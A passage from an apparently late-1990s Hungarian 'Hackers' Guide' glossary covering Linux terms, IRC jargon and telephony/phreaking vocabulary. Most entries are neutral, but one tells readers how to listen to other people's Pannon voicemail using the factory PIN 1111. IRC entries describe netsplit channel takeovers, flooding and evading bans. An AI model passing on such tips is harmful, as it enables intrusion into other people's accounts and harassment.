hordozzák, illetve kisebbnagyobb hibajavítások, kiegészítések esetén általában csak ezeket a néhány soros foltokat kell alkalmazni, s ebben az esetben sem kell a teljes (javított) programot beszereznünk. path = útvonal vagy elérési út A PATH lehet egy környezeti változó, amely tartalmazza a teljes elérési útvonal nélkül megadott file-ok lehetséges elérési útvonalait, de lehet 63 Hackers’ Guide magának az elérési útnak a neve is. Pl: ennek az dokumentumnak a neve: dict.html, a hozzá tartozó elérési út: wwwdatanethu/generations/linux/ {Q} {R} root = root ??? Az a hozzáférési név szokott lenni a Linux-os (UNIX) operációs rendszerekben, mely rendszer szinten engedélyezi a file-ok, beleértve a könyvtárak, file-rendszerek megváltoztatását, törlését. A root hozzáféréssel rendelkezők általában a rendszeradminisztrátorok, akik a rendszer működéséért felelősek, tekintettel arra, hogy root-ként való bejelentkezés után

az illetőre nem vonatkoznak a biztonsági megkötések, korlátlanul tehet bármit. Éppen ezért a root jelszavát sűrűn változtatják, ill. sok helyen már nem is így hívják. root directory = főkönyvtár vagy tőkönyvtár A tő file-rendszeren található, a könyvtár-hierarchia kiindulópontja. A főkönyvtárból indulnak a további alkönyvtárak. Az Linux-os (UNIX) operációs rendszereknél a DOS-sal ellentétben csak egyetlen főkönyvtár van, az egyes meghajtók, ill. az azokon tárolt file-rendszerek más alkönyvtárak alá illesztődnek be. {S} shell = parancsértelmező vagy burok ? A shell az ami parancsainkat, utasításainkat értelmezi és rendszerszinten végrehajtja azokat. Több féle shell létezik, melyek működése, parancskészlete kisebb-nagyobb mértékben eltér egymástól. A legnépszerűbb shell-ek közé tartoznak a bash, a tcsh, a zsh és a ksh. shell script = parancsprogram vagy burokprogram A shell saját parancsaiból és külső

programokból (parancsokból) álló program. A legtöbb eltérés a shell-ek között itt tapasztalható. Ugyan alapjaiban a shell script-ek nyelvei azonosak, de lényeges eltérés lehet mind a parancskészletben, mind pedig a helyesírásban. site = hely Elsősorban az Interneten használt kifejezés a különböző célokkal látogatható helyek miatt. Ilyen értelemben használják a WWW site (WWW hely) és az FTP site (FTP hely) kifejezést. swap = csere A Linux-os operációs rendszerek a memóriaigények kielégítésére jó hatékonysággal használják az ú.n swap eljárást Általában létezik egy swap file vagy swap partíció ahová az éppen alvó programok, programrészek ill. azok adatai átkerülnek, így a rendes memóriában marad hely az aktív programok számára. swap file = csere file Az a file, melybe az éppen alvó programok, programrészek, ill. adatai kikerülnek. swap partition = cserepartíció A keménylemezes meghajtónak egy olyan partíciója,

melyet az alvó programok, ill. azok adatainak ideiglenes tárolására használnak, ha a rendes memória nem elegendő az aktív programok memóriaigényeinek kielégítésére. 64 Hackers’ Guide Tekintettel arra, hogy a cserepartícióknak saját file-rendszerük van, gyorsabban működnek, mint a csere file. symbolic link = jelképes kötés Az ext2 file-rendszer megengedi, hogy valamely könyvtárban ugyanazon vagy más néven szerepeljen egy másik könyvtárban található file, de csak jelképesen. A file ugyanis továbbra is az eredeti könyvtár "tulajdona" marad, de ebből a másik könyvtárből úgy látszik, mintha ott lenne. File lehet egy másik könyvtár is, így jelképesen az is szerepelhet máshol. Egy gyakorlati példa: tegyük fel, hogy a jelenlegi Linux rendszermagunk forráskódja a /usr/src/linux-2.018-ban van Sok program azonban fordítás közben a /usr/src/linux könyvtárban keresi a forráskódot. Mi azonban nem akarjuk ezért az eredetit

átnevezni, mert mindig első ránézésre szeretnénk tudni, hogy milyen verziójú forráskódunk van meg. A megoldás, hogy készítünk egy jelképes kötést a /usr/src/linux-ról a /usr/src/linux-2.018-ra, s így az előbbi néven is elérjük az utóbbit. {T} {U} uid (user identifier) = felhasználói azonosító Minden kiszolgáló gépnek van felhasználója (van amelyiknek csak a rendszergazda), s minden felhasználónak van saját uid-je. Ez egy szám mely alapján a rendszer azonosítja például, hogy melyik file kihez tartozik. Az uidhez általában tartozik egy login (bejelentkezési) név is, így általában az kerül kiírásra ha pl. listát kérünk egy könyvtár tartalmáról Lásd még: gid. user = felhasználó Az a személy, aki az operációs rendszert, s az azon futó alkalmazásokat használja. Az egyszerű felhasználó általában nem foglalkozik a rendszerrel mélységében, azt nem változtatja, vagy nem is változtathatja meg. Többnyire semmi mást nem

csinál, csak belép a rendszerbe, elindít egy-két programot, dolgozik azokkal, majd kilép. user account = felhasználói hozzáférés Lásd: account. {V} {W} WWW = World Wide Web = Világméretű háló Az Internet adta műszaki lehetőségeknek, ill. a HTML kifejlesztésének köszönhető a WWW kialakulása. Ez a XX század végén hiper sebességgel kialakuló hipermédia. Ellentétben az újságokkal, a rádióval és a televízióval, a WWW egy minden szempontból interaktív dolog. Itt nem csak olvasunk, nézünk és hallgatunk, hanem mi vagyunk azok, akik megmondják, hogy mit, mikor és hol nézünk. Döntéseink nem csak a kapott információt befolyásolhatják, de érintkezhetünk az egész világgal. Bármikor dönthetünk úgy, hogy körnézünk Japánban, benézünk Washingtonba, vagy éppen itthon "kirándulunk" egy kicsit. A hipermédia egyenes következménye a kibertér A kibertérben sok mident lehet csinálni, másodpercek alatt el lehet jutni olyan

helyekre, ahova járművel talán soha nem jutunk, megtehetünk olyan dolgokat, 65 Hackers’ Guide amit talán soha nem tehetnénk meg és beszélgethetünk olyan emberekkel, akikkel talán - főleg a nagy távolságok miatt - soha nem találkozhattunk volna. {X} {Y} {Z} * IRC szótár Ha valami nem pontos, tudsz olyan fogalmat hiányzik és itt lenne a helye, vagy nem érted az egyik magyarázatot, írd meg nekem! Minden levélre szívesen válaszolok. BOT EGGDROP fenntarott csatornák Channel Delay csatorna desync firewall flood G-LINE IP IRCOP K-LINE lag massxy netsplit nick collision Nick Delay serverop smiley PartyLine re takeover BOT A BOT a robot szó rövidítésébôl ered. A BOT-ok ugyanolyan felhasználók, mint bárki más, csaképpen olyan serveren vannak, amik mindig net összeköttetésben állnak, s az emberek helyett itt egy program cselekszik, mindig az adott helyzetnek megfelelôen. Nagy - de igen gyakori - tévhit tehát, hogy otthonról, telefonos

összeköttetésnél elindítva egy programot, botot tudunk futtatni server nélkül. BOT-ot írni hosszú idô, ezért legtöbben olyan BOT-okat használnak, amit már valaki más megírt - csak megfelelôen be kell ôt konfigurálni. A legelterjedtebb az EGGDROP BOT. Kapcsolódó témakörök: EGGDROP parancsok és jogok PartyLine CSATORNA A csatornák nevei #, & , + vagy ! jellel kezdôdnek, majd egy (maximum 200 karakter hosszú) névvel folytatódnak. A # jellel kezdôdô csatornák a háló minden serverérôl látszódnak, míg ha egy csati neve &-al kezdôdik, akkor az csupán csak egy serveren él, azon amelyiken meg lett nyitva. A +-os csatornák mode-talanok (nincs op, stb) A ! jeles csatornák abban különböznek a többitôl, hogy netsplit esetén másképp viselkednek (ez a csatifajta a 2.10-es serverektôl kezdve van, és a mIRC még nem támogatja). Vannak a server által fenntartott csatornák, ezeken nem beszélgetni lehet, hanem a server üzenetetit

hallgatni. Ilyenek pl: &errors - "server error messages", hibaüzenetek, kiírja pl. ha valaki fel akar csatlakozni a serverhez, de a server "tele van". &kills - "operator and server kills", jelzi a nick collosionokat, vagy ha egy IRCOP a 66 Hackers’ Guide KILL parancsot használja. &local - "noticees about local connections", jelzi, ha valaki túl sok klónnal akar feljönni, stb. &servers - "servers joining and leaving", jelzi ha egy server levállik Egyéb: & notices, &services, &numerics, &hash, &channel Ezek a csatornák +a és +q flag-ekkel rendelkeznek. Magyar csatornák pl: #Babalany , #csevej , #aladdin , #debrecen , #getto , #irckocsma , #magyar , stb. A JOIN parancs. Channel Delay DESYNC Netsplit vagy lassú serverkommunikáció miatt létrejöhet egy olyan állapot, hogy az egyik serveren lévôk mást látnak egy csatornán, mint a másikra csatlakozottak. Ez nevezzük DESYNC-nek.

Ilyenkor elôfordulhat, hogy látszólag van OP-od, valójában viszont nem tudod használni, hibaüzenetet kapsz, pedig amit kiadtál parancsot, az "hibátlatnul" teljesítve lett, moderated csatornára +o ill. +v nélkül tudsz írni, stb FIREWALL A tűzfal a bejövô és kimenô adatokat figyeli, és szükség esetén BLOCK-olja. Egy jól konfigurált tűzfallal védett gépet csak olyan programhiba kihasználásával lehet lefagyasztani, amely nem használ TCP/IP-t. Kapcsolódó témakör: Firewall otthonra - a ConSeal Firewall letöltése és bekonfigurálása. FLOOD Ha valakinek nagyon nagy az adatforgalma, akkor a server kidobja "excess flood" üzenettel. Ez a LAG és a NETSPLIT-ek elkerülése érdekében van bevezetve A FLOOD-olást rosszindulatuan is lehet használni - ha egyszerre többen folyamatosan adatokat küldenek valakinek (pl. PING-elik), akkor könnyen meglehet, hogy az illetô kiesik a serverrôl. Kapcsolódó témakör: FLOOD típusok és

használatuk. G-LINE Ha valami rosszat tesz valaki, akkor egy IRCOP G-LINE-ra tudja tenni, letiltva ezáltal az összes hálón lévô serverrôl. Kapcsolódó témakör: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? IP Az Interneten mindenkinek van egy azonosító száma, amirôl meg lehet ismerni. Ez az IP-cím. Mivel ez egy nagyon hosszú szám, pontozottdecimális alakban szoktuk használni, ami x.xxx alakú, ahol x 0-tól 255-ig tetszôleges szám Van static IP (minden esetben ugyanaz az IP címe valakinek. Ilyen pl a wwwmicrosoftcom-nak az IP-je :), és dynamic IP (minden csatlakozáskor más az IP címe valakinek. Pl modemes Matávnet elôfizetôk). Ha valaki "több példányban" van fenn az IRC-n, akkor erre az IP címe alapján rájöhetünk (ha két nick IP címe egyezik, akkor 67 Hackers’ Guide ugyanazon a géprôl van mindkettô). FONTOS, hogy ez nem minden esetben igaz, pl ha az illetô tűzfal mögött van, akkor csak a tűzfal IP-címéig

jutunk el (pl. firewall.matavhu) IRCOP (IRC Cop, Oper) Az IRCOP nem egyenlô azzal, hogy valaki egy csatornán OP-os. Azt nevezzük IRCOP-nak, akinek egy IRC serveren van OP-ja, ô nem csatornára ügyel, hanem az IRC hálózatra. Kellemetlen dolog haragban lenni egy IRCOP-al, mindenesetre semmiképpen sem végleges hiba, akkor sem, ha BAN-ol a serverrôl, hiszen egy leleményes felhasználót ez nem állíthat meg. Megszokott tévhit, hogy az IRC operátorok segítenek ha elfoglalják a csatornádat ez nem így van, egyrészt mert az IRCNET-en nincs a csatornáknak tulajdonosa, másrészt pedig mert az IRCOP nem tudhatja, hogy a csatorna eredetileg kié volt. Az IRCOP-ok - elvileg - nem foglalkoznak a csatornák ügyeivel kapcsolatban. Hogyan lehetsz IRCOP? Az IRC.BMEHU oldalán azt írják, hogy csak úgy, ha csatlakoztatod a serveredet az IRC hálóhoz. Pár sorral alatta pedig azt, hogy a mostani 4 IRC server több mint elég, ezért nem engedik továbbiak csatlakoztatását. Vajon

akkor miért írták ki pont ezek felett, hogy milyen gépkövetelmények vannak, ha valaki csatlakozni akar a serverével? Ahhoz, hogy IRCOP legyél, elôször is nagyon jól meg kell ismerned a UNIX-ot, másodszor mindent meg kell tanulnod az IRC-vel és a legnépszerübb kliensekel (ircII, mIRC) kapcsolatban (ha valaki kérdez valamit, tudnod kell válaszolnod rá.), ezután pedig mindent meg kell tanulnod a TCP/IP-rôl. Ha mindez megvan, szükséged van egy megfelelô serverre, lehetôleg T1 csatlakozással (az ISDN és a modemek rendszerint nem elég gyorsak), s ezután találnod kell egy servert, amihez csatlakoztathatod. Kapcsolódó témakör: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? IRCOP parancsok K-LINE Ha valami rosszat tesz valaki, akkor egy IRCOP K-LINE-ra tudja tenni, letiltva ezáltal az illetôt a serverrôl. Kapcsolódó témakör: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? LAG Akkor mondják, hogy LAG van, amikor az adatok lassan érkeznek

meg valahonnan valahová. Pl ha sokáig nem ír senki, majd hirtelen tele lesz 2 oldal, akkor azt mondhatjuk, hogy "nagy a LAG". MASSxy Ha valaki egyszerre mindenkitôl elveszi az OP jogot, azt MASSDEOP-nak hívjuk. Ezen szintaktika szerint lehetséges MASSKICK-rôl, MASSINVITE-ról, és hasonlókról beszélni. NETSPLIT 68 Hackers’ Guide A netsplit azt jelenti, hogy két (vagy több) IRC server között megszakadt a kapcsolat. Ilyenkor "* [nick] has quit IRC ([servernév] [servernév])" üzenettel tünnek el a szemed elôl a nick-ek. Nézzünk egy példát! Legyen A, B, C, D és E egy-egy IRC server! A kapcsolódási pontjaik: A---B---C | | D E Ha A és B kapcsolata megszakad, akkor pl. a D-rôl az látszik, hogy az E-n lévô emberek kiestek - ugyanakkor pl. a C-n lévô emberek számára is eltünnek az A serveren lévôk. Netsplitnél néha elôfordúl, hogy az egyik server átállítja a csati mode-jait, vagy egy ember flag-eit (pl. * irc.bmehu sets

mode +o ViDe0) Ha valamiért netsplit van, akkor (ha nem serverreconnect miatt volt "split") adott ideig (ez serverbeállítástól (Nick Delay & Channel Delay) függ) bizonyos nick-ek és csatornák nem használhatóak ezek azok, amik egy másik serveren éltek. Ilyenkor "temporarily unavailable" hibaüzenetet kapunk, ha megpróbáljuk ôket használni/elérni. 10 perc után viszont ismét szabad lesz mind, s ha addig nem lett vége a splitnek, akkor a leszakadt serveren opot kaphat egy ilyen csatin az az ember, aki elôször megnyitja. Az általa átállított módok, és az új OP-osok a netsplit végén az eredeti csatornára is hatással vannak - azaz az illetônek ott lesz opja, és a megváltozott csatibeállítások is öröklôdnek. Ilyen módon az illetô akkor is be tud jutni egy csatornára, ha onnan BANolva van, ill ha az +i-s, +k-s, vagy +l-es Kapcsolódó témakör: &servers NICK COLLISION Nick collision létrejöhet netsplit vagy lag miatt

is. Ha pl netsplitnél az egyik serverre olyan nick-el megyünk fel, ami a hálózat éppen nem látott részén már használva van, akkor amikor a serverek ismét összekapcsolódnak, mindketten kiesnek az IRC serverrôl (annak elkerülése végett, hogy ketten ugyanazt a nick-et használják). Kapcsolódó témakör: nick collision statisztika [angol] SERVEROP Ha valakinek egy server ad opot, azt SERVEROP-nak hívjuk (lásd.netsplit) SMILEY A SMILEY-ok, azaz a mosolyok a testbeszéd helyettesítését hivatottak szolgálni IRCn. A leggyakrabban használtak a :) és a :( verziók, melyek 90°-al elforgatva nézve egy-egy fejecskét adnak (a ":" jelképezik a szemeket, a ")" pedig a szájat). Az eredeti változatban :-) a mosolygó arc, a :) ennek rövidített formája. Jelentése változó, kifejezhet örömöt vagy vidámságot egyaránt. Szintén gyakorta használt a ;/ forma, amely mint látható "szájhúzást" utánoz - a különlegessége abban

rejlik, hogy angol billentyűzeten a ";" és a "/" jelek egymás alatt találhatóak, így az ábra elkészítése csak egy "ujjvonás". Szintén hasonló a =] 69 Hackers’ Guide figura, ahol mindamellett, hogy a "=" és a "]" karakterek egymás alatt vannak, a következô billentyű az ENTER, így még ahhoz sem kell mozdítani a kezünket. Használatosak ezek fordítottjai is ((: , ): , /;), illetve egyéb változatok ( :D , :C , >:) , :`(`` , stb. (nevetés, mély szomorúság, ördögi mosoly, sírás)) PARTYLINE Az EGGDROP botok egymással összekötve alkothatnak egy úgynevezett PartyLinet, amire DCC CHAT-el, vagy TELNET-eléssel lehet csatlakozni. A PartyLine elônyei, hogy netsplit esetén sem szakad meg a kapcsolat - hiszen ircservertôl független továbbá általában sokkal gyorsabb is - szintén ezen okból kifolyólag. Ha a BOT nevében akarsz kiadni parancsot, azt is itt teheted meg. RE Köszönési forma

IRC-n, akkor használatos, amikor újból találkozol valakivel rövid idôn belül. TAKEOVER A takeover annyit jelent, hogy valaki elfoglal egy csatornát. Ennek többféle módja van, az egyik, hogy valamilyen módon OP-ot szerez az illetô, s mindenki mást megfoszt az operátori jogától, a másik az, hogy mindenkit "kilô", aki a csatin van. * Phreak szótár A5/1:A GSM rendszernek saját kidolgozott titkosító algoritmusai vannak. A Westel 900 és valamennyi európai ország az A5/1 változatot használja. A titkosító eljárás bemeneti paramáterei a 22 bit hosszu keretsorszám (FrNo), és az autentikáció során kiszámított Kc titkosító kulcs. A GSM rendszerben használt valamennyi jelzo és információs bit, a PCM technikában használatos kerethez hasonló GSM TDMA keretbe vannak szervezve. A több keretbol álló hiperfrém közel 35 óra hosszú A keret sorszáma nem folyamatosan inkrementálódik, hanem három különbözo keretjellemzo paraméter

kombinációjából jön létre. A titkosítás csak a levegoben utazó biteket védi. A vezetékes hálózatba irányuló hívás védettségi szintjét a mobil hálózaton kívül a GSM rendszer nem tudja befolyásolni. Hasonló a helyzet két GSM hálózat között felépített kapcsolat esetében is. Ilyekor lehetséges, hogy a nemzetközi távközlési utakon keresztül az információ hozzáférheto harmadik fél számára is. A/D ÁTALAKITÓ (ADC = Analóg Digital Converter): Az analóg jelet digitálissá (általában binárissá) átalakító áramkör. A kívánt felbontástól és a szükséges mintavételi frekvenciától függoen többféle felépítésu és muködési elvu ADC ismert. 70 Hackers’ Guide Legfontosabb paramétereik: a kvantálási bitek száma (pl. 18), a mintavételi frekvencia (pl. 48 kHz) és a kvantálás módja (lineáris vagy nemlineáris), a feldolgozható maximális amplitúdó és a muködési elv (pl. szukcesszív approximáció) ADATJEL:

Analóg vagy digitális jel, amely felhasználói információt hordoz. ALKÖZPONT(PBX): A foközponthoz hasonló tudású, ám kisméretu telefonközpont, amely magánhálózatokban üzemel. ÁLLANDÓ ÜZEMMÓDÚ SZOLGÁLTATÁSOK: Az ügyféltol külön aktiválást vagy muködtetést nem igényelnek, mert az aktiválást a szolgáltató végzi el a megrendeléskor (pl. közvetlen beválasztás) Definity-példa: egy mellék letiltása ANALOG JELEK: Pl. beszéd közben létrejövo levegorezgések (hullámok) Formájuk hasonlatos (analóg) azzal a hatással, amely létrehozta oket. Végtelen különbözo értéket vehetnek fel. A távközlésben az analóg jeleknek három jellemzoje kiemelten fontos: az amplitúdó, a frekvencia és a fázis. ATM-ÁTVITEL: Asyncronous Transfer Mode, azaz csomagkapcsolt, aszinkron, kapcsolatorientált átvitel (=> csomagkapcsolt átvitel). Kapcsolatorientált, mert a cellafolyam továbbítása, azaz az információtranszfer elott történik az

útvonalválasztás, utána pedig az útvonallebontás. Aszinkron, mert nem kell az adó és a vevo oldalt szinkronizálni az információátvitelhez. Csomagkapcsolt, mert az ATM-cellák autonóm módon jutnak el a feladótól a vevoig. ATM-CELLA: Az ATM-átvitel alapegysége (=> ATM-átvitel). 53 byte hosszú, ami 5 byte fejlécbol áll; itt helyezkedik el az útvonalinformáció, a hibajavítás, a prioritás, stb. A cella többi 48 byte-ja tartalmazza a felhasználói információt. AUTOMATIKUS HÍVÁSELOSZTÁS: Rugalmas megoldást kínál a bejövo hívások hatékony és egyenletes elosztására az elérheto ügyintézok között. Forgalmi terhelésétol függoen lehet választani a híváselosztási módszerek között. Minden csoport várakozási sora is beállítható. A soron belül prioritást is meg lehet határozni CALLER ID: Calling Number Delivery (CND) Hivas azonositas,1999. ig hazankban nem mükodott csak rendorség tüzoltoság használhatta de várhatóan 2000.

tól a sima elöfizetök is hasznalhatjak ha minden igaz.Haszálatának letiltásának oka a személyisegi jogok voltak .=) CARRIER: Az a hang amikor felhívod az internet szolgáltatódat és ilyen fura sípolásokat hallasz. ekkor a modemek információt cserélnek, és megállapodnak egymás közt a kapcsolat sebességérol és egyéb dolgokról. Na ez az idezet vajon kitol van?6 pontos kérdés. CB-TELEFON: A központból táplált (Central Battery) készülék. Ebbe a rendszerbe tartozik szinte minden telefon, amellyel az átlagember találkozik. (=> LB-telefon) CB-MODEM: |PC|<-->|CB-MODEM|<-->|CB|<-->|VEVOCB|<-->|CBMODEM|<->|MASIKPC| CELLURAR RADIO:900Mhz Rövid en de velosen az elv:Minden egyes cellában van egy bázis állomás,amelyet egy épület vagy hegy tetejére úgy helyeznek el,hogy az kommunikálni tudjon a cellában lévo összes radióval(Mobil T).Mostantol a radió a mobilt jelenti.Naszóval aimkor egy mozgó telefont bekapcsolnak

akkor az végigpásztazza a bázis állomások frekvenciájit azért hogy a legerosebb jelet magtalálhassa(valoszinüleg a legközelebbi állomásét) és egy a telefon számát bejelento üzenetet kuldhessen.A bázis állomás ezutan közli a mozgótelefonnal,hogy melyik cellában van,és melyik frekvenciát használhatja.Amikor egy mozgótelefon hívást szándékozik kezdeményezni akkor a báziállomásának egy üzenetet küld és az kijelöli neki egy neki megfelelo frekit (ha van ilyen) A hívás befejeztével a bázis átveszi a frekenciát és egy másik hívónak adjaTöbb cellában is alkalmazható ugyanaz a frekvencia ha megoldott ,hogy az adók egymás 71 Hackers’ Guide hatótávolságan kivul legyenek.Amig a mózgó telefonok be vannak kapcsolva,folyamatosan figyelik a bázis állomások frekvenciáit,hgoy tudjak melyik állomás frekvenciája a legerosebb.Amikor egy másik válik erosebbé (vélhatoen mert egy masik új cellába kerult) a telfon jelenti ezt a

bázisállomásnak,amely átadja a kapcsolatot a másik bázisnak.Az új bázis utasitja a telefont ,hogy kapcsolodjon át az új frekvenciára Azert fontos,hogy a bázis állomások mindvégig ismerjék a mozgótelefonok hollétét,hogy a bejovo csomagokat a megfelelo bázis allomás felé továbbíthassák. A telefonok helyét egy számítógép tartja folyamatosan nyílván,amelyhez az összes bázis állomas hozza férhet, ye 1984 =).Kövkép orwell nagy testvére elbujhat CROSSBAR- RENDSZER: A közös vezérlésu mechanikus kapcsolórendszer egyik típusa. Minden számjegyet osztályoz, míg a tárcsázást be nem fejezzük, majd a hívás továbbítása elott egy szabad útvonalat keres. CRACKER:különbözo operációs rendszerekre és platformokra specializálódtak. Próbálgatnak, kisérleteznek amig valami "használhatóra" nem bukkannak. Elso lépésben a cél interaktív kapcsolat (login) megszerzése, ami kemény munkával továbbfejlesztheto root avagy

superuser jogkörré, aki egy-egy gép legfobb adminisztrátora. A kis közöségeket az érdeklodés nagyobb közösségekké formálja, mert a tudás, tapasztalat így sokkal jobban átadható. CSOMAGKAPCSOLT ÁTVITEL (Packet switching): Az információtovábbítás csomagokban történik. A csomagok a továbbítandó információ feldarabolásával keletkeznek, amit fejléccel látunk el. A fejléc tartalmazza az útvonalinformációt, a prioritást, a hibajavítás információit, stb. A vevooldalon a fejlécet leválasztjuk, majd a csomagokból visszaállítjuk az eredeti információt. (=> vonalkapcsolt átvitel) CIRCUIT SWITCHING:Vonal kapcsolás.A vonal kapcsolas lényeges tulajdonsága az , hogy a vég-vég kapcsolatot az elött fel kell építeni még mielött még bármi féle adatot küldeni lehetne.A tárcsázás végétol a kicsörgésig eltelt ido nyagytavolságú, vagy nemzetkozi hívások esetén akár 10 másodperc is lehet.Ez ido alatt a telefon rendszer egy

fizikai utat épit ki.A hívó jelnek egészen a hívott készulékig kell jutnia,majd onnan egy nyugtának kell visszaérkeznie. BAUD:1Baud sebességu az az átvitel,mely egy másodperc alatt 1 jelet visz át.Tiszta fizika óran érzem magam. Ha az átvitt jelek bináris értékek akkor a baud megegyezik a bit/szekundummal D/A ÁTALAKÍTÓ: (DAC = Digital Analog Converter): Digitális (többnyire bináris) információt alakít analóg jellé. Többféle muködési elvut ismerünk, pl az integráló DAC-t. Fontos jellemzoje a max órajel (a feldolgozható max mintavételi frekvencia) és a bitszám, azaz a felbontás. Ha a ADC nemlineáris kvantálású volt, akkor a visszaalakításnál használt DAC karakterisztikája tükörképe kell legyen az ADC karakterisztikájának (pl. logaritmusos - exponenciális). DIGITÁLIS JELEK: Az analóg jelekkel (=> analóg jelek) ellentétben csak meghatározott számú különbözo állapotuk létezhet. Egyik legfontosabb típus a bináris jel,

ahol csak két állapot létezik. Az életben a bináris jelrendszerek olyannyira elterjedtek, hogy digitális jelek alatt általában bináris jeleket értünk. DATEX-P: A szolgáltatásban csomag kapcsolt adatátvitelt használnak. DTMF-rendszer (Dual Tone Multi Frequency system): Hangfrekvenciás (tone) üzemmódban minden billentyut egy frekvenciapár reprezentál. Minden számhoz (valamint a * és # gombokhoz) egy alacsony és egy magas frekvenciából álló pár tartozik az alábbi séma szerint: 1 2 3 A 697 Hz 72 Hackers’ Guide 4 5 6 B 770 Hz 7 8 9 C 852 Hz * 0 # D 941 Hz 1209 Hz 1336 Hz 1477 Hz 1633 Hz A megkívánt frekvenciapontosság: 11.8%A távközlésben hívószámok céljára (általában) csak a 0 . 9 számjegyeket használják, a * és a # néhány speciális funkcióhoz szükséges (pl. fax) Az A D billentyuk a „köznapi” készülékeken nem találhatóak meg, és csak speciális célokat szolgálnak. ECHO SUPPRESSOR:Visszhangelnyomo ez egy olyan eszkoz

amely észleli az egyik oldalrol érkezo emberi hangot és a masik iranyból érkezo emberi hangot elnyomja.(analog anno) ELOKIEMELÉS (preemphasis): Mind analóg, mind digitális hangátvitelkor gyakori a használata. Célja a jel-zaj viszony javítása Lényege, hogy az eredeti frekvenciamenetet megváltoztatják: a nagyobb frekvenciájú hangokat növelt amplitúdóval szerepeltetik és az átvitel így történik (=> utóelnyomás). EURO-ISDN: A nyugat-európai távközlési szolgáltatók többsége 1989-ben nyilatkozatot írt alá, hogy 1993-ig egy egységes, szabványos ISDN-t valósítanak meg. 1993 decemberében került sor bevezetésére, elnevezése európai kiterjedtségére utal. Lehetové teszi, hogy a felhasználók ugyanazon készülékeket használhassák az egymás közötti kommunikációra az Euro-ISDN-hez csatlakozó országokban. (=> ISDN) FEDETTSÉG: A mobiltelefon használatához szükséges rádiójelekkel ellátott terület. FÉLÁLLANDÓ ÜZEMMÓDÚ

SZOLGÁLTATÁSOK: A szolgáltatótól való megrendelés után az elofizetonek kell aktiválni ill. deaktiválni Aktivált állapotban muködésük automatikus, az elofizetotol külön beavatkozást nem igényelnek (pl. hívásátirányítás foglaltság esetén). Definity- példa: hívások elküldése hívásfedezési útvonalra. FÉLDUPLEX ÁTVITEL:Half-duplex, ha az adatokat egy vezetéken mindkét iranyba tovabbíthatjuk, de az adatátvitel egy adott idöben csak az egyik iranyban folyik.Ebben az esetben tehát az adó és a vevo idonként szerepet cserél. FREKVENCIA(CELLUAR): 900MHz telefon frekik Panasonic 900MHZ : CH BASE HANDSET -- ------- ------01 902.100 926100 02 902.130 926130 03 902.160 926160 04 902.190 926190 05 902.220 926220 06 902.250 926250 07 902.280 926280 08 902.310 926310 09 902.340 926340 10 902.370 926370 11 902.400 926400 ^^^ ^^^ 73 Hackers’ Guide ^^^ 59 903.870 927870 ch(csatorna) base(bázisállomás) handset(kézibeszélo) FOKÖZPONT: A nyilvános

hálózat azon pontja, ahol a helyi hívásokat kapcsolják. Helyi, vagy végközpontnak is nevezik. FULL-DUPLEX ÁTVITEL: Azt jelenti, hogy a kommunikáció a két fél között állandóan kétirányú és egyideju. Legjobb példa erre a telefonbeszélgetés GERINC: A hálózat fo összeköttetése. Pl egy három kapcsolóközpontos (alközpontos) magánhálózatot bérelt átviteli szolgáltatások kötnek össze. GSM: Global System for Mobile Telecommunications. A legelterjedtebb egységesített digitális mobiltelefon-szabvány. GSM rendszerben a maximális cella sugár kb 35 km. HALÓZATI JELSZÓ: Különbözo tiltási GSM-szolgáltatások készüléken történo aktiválásához és deaktiválásához szükséges kódszám. HANGFREKVENCIA: Az értheto beszéd frekvencia tartómánya 300 és 3000Hz kozé koncentrálodik Ezért a normál telefoncsatornákat errre a sávszélességre tervezték meg.Az ilyen csatornát hangcsatonának is nevezik mert ezen keresztül haladnak át az

emberi hanggal kapcsolatos legfontosabb frekvenciák HANGJEL: 300 Hz - 3400 Hz sávszélességu analóg jel, amely a telefonban hallható hangot állítja elo. HANDOVER: Handover, vagy handoff mint, ahogy Észak Amerikában hívják, egy folyamatban lévo hívás átkapcsolása másik csatornára vagy cellára. HANGPOSTA:Mobiloknál a üzenetrogzito tipp:pannon- a panonnál a hangposta száma: 06-20-9-400-400 majd meg kell adni a 7jegyu telcsiszámot utanna egy * és a kód ami a hangposta meghalgatásához kell vagyis kellene mert elég sok gyagya mobilos van aki nem allitja át a gyári kódót ami 1111 utanna nyomj egy csillagot es meg is hallgathatod feltée hogy nem változtata meg. HÍVÁSÁTIRANYITÁS: A hívásátirányítási szolgáltatásnak különbözo változatai ismertek: - hívásátirányítás foglaltság esetén (CFB = Call Forwarding Busy); hívásátirányítás „nem felel” esetén (CFNR = Call Forwarding No Reply); hívásátirányítás feltétel nélkül

(CFU = Call Forwarding Unconditional). HÍVÁS TILTÁS: A kimeno hívások tiltása. HÍVÁSONKÉNTI ÜZEMMÓDÚ SZOLGÁLTATÁSOK: Az elofizeto - igénye szerint hívásonként vagY muködteti, vagy nem. Ezen szolgáltatásokat is meg kell rendelni a szolgáltatótól (pl. hívástartás) definity -példa: hívás átvétele HÍVÁSVEKTOROZÁS: Elore beprogramozott kezelési módszer, utasítássorozat. Nagyon hatékony logikai eszköz. A leghatékonyabb és legrugalmasabb eszköz a bejövo hívások irányítására. Elsosorban híváselosztási csoportok forgalmának kezelésére használható, de a várakozási sorok kezelésére is alkalmas. HÍVÓ VONAL AZONOSÍTÁSA (CLIP = Calling Line Identification Presentation): Bejövo hívás esetén - amennyiben ezt a hívó fél nem tiltotta meg - a hívott fél készüléke kijelzi azt a hívószámot, amelyrol a hívást kezdeményezték. A hívott fél ezután dönthet a hívás fogadásáról. IMEI-SZÁM: International Mobile

